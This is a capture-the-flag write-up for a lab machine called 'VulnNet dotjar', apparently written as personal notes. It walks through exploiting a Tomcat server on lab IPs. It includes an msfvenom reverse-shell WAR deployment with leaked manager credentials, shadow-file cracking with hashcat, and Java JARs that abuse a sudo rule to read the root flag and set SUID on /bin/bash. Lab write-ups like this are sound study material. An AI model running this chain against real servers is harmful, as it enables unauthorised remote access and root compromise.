---
title: VulnNet dotjar
created: '2021-04-23T19:20:26.098Z'
modified: '2021-04-28T23:29:27.501Z'
---

# VulnNet dotjar

## Intial Scanning
``nmap -A -v 10.10.124.13``
- 8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
- 8080/tcp open  http    Apache Tomcat 9.0.30
- **/manager/** accessible

## Finding Vulns
``ExploitDB``
- Ghostcat
  - Apache Tomcat - AJP 'Ghostcat File Read/Inclusion - [here](https://www.exploit-db.com/exploits/48143)
  - MSF: auxiliary/admin/http/tomcat_ghostcat

## Intial Access
- Generate Reverse Shell payload: ```msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.4.104 -f war -o reverse.war```
- Deploy payload: ```curl --upload-file reverse.war --header "Authorization: Basic d2ViZGV2OkhnajNMQSQwMkQkRmFAMjE=" "http://10.10.173.3:8080/manager/text/deploy?path=/reverse"```
- Check deployment: ```curl --header "Authorization: Basic d2ViZGV2OkhnajNMQSQwMkQkRmFAMjE=" http://10.10.173.3:8080/manager/text/list```
- Run listener: ```nc -lvvp 4444```
- Visit the payload: **http://10.10.173.3:8080/reverse**

## Box recon
- Copy LinPEAS to the box.
- File with weak permission: **/var/backups/shadow-backup-alt.gz**
- Create temp directory, copy the file and extract it. File is **backup of /etc/shadow**
- **jdk-admin** can run sudo. Can run ``(root) /usr/bin/java -jar *.jar``

## Found Credentials
- "Developer Access" - ```webdev:Hgj3LA$02D$Fa@21```
  - Privileges: _admin-gui_
  - Server Status page
  - Host Manager HTML
  - Manager text interface
- Leaked backup: "/var/backups/shadow-backup-alt.gz"
  - Cracked using ``hashcat -a 0 -m 1800 creds.txt /home/voldy/SecLists/Passwords/xato-net-10-million-passwords-1000000.txt``
  - Cracked password: **794613852**
  - Switch to **jdk-admin**: ``su jdk-admin``
  - Get the user flag

## Exploit Code
- Create a temporary directory and new file structure: ``com/reverse/command/Main.java``
```java
package com.reverse.command;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

public class Main {
    public static void main(String[] args) {
        ProcessBuilder processBuilder = new ProcessBuilder();
        processBuilder.command("/bin/cat", "/root/root.txt");
        try {
            Process process = processBuilder.start();
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
            int exitCode = process.waitFor();
            System.out.println("\nExited with error code : " + exitCode);
        } catch (IOException e) {
            e.printStackTrace();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    }
}
```
- Comple to Java class: ``javac com/reverse/command/Main.java``
- Create the JAR: ``jar cfe Reverse.jar com.reverse.command.Main com/reverse/command/Main.class``

### Getting root flag
- Compiled the JAR as above
- Run the jar as mentioned in sudo config: ``/usr/bin/java -jar Reverse.jar``

## Expoit Code 2
- Create a temporary directory and new file structure: ``com/reverse/command/Main.java``
```java
package com.reverse.command;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

public class Main {
    public static void main(String[] args) {
        ProcessBuilder processBuilder = new ProcessBuilder();
        processBuilder.command("/bin/chmod", "+s", "/bin/bash");
        try {
            Process process = processBuilder.start();
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
            int exitCode = process.waitFor();
            System.out.println("\nExited with error code : " + exitCode);
        } catch (IOException e) {
            e.printStackTrace();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    }
}
```
- Comple to Java class: ``javac com/reverse/command/Main.java``
- Create the JAR: ``jar cfe Reverse.jar com.reverse.command.Main com/reverse/command/Main.class``

### Getting the root flag 2
- Complied the JAR as above
- Run the jar as mentioned in sudo config: ``/usr/bin/java -jar Reverse.jar``
- Check if **bash** got **SUID**: ``ls -l /bin/bash``
- If it is, run ``/bin/bash -p``. Get the root shell

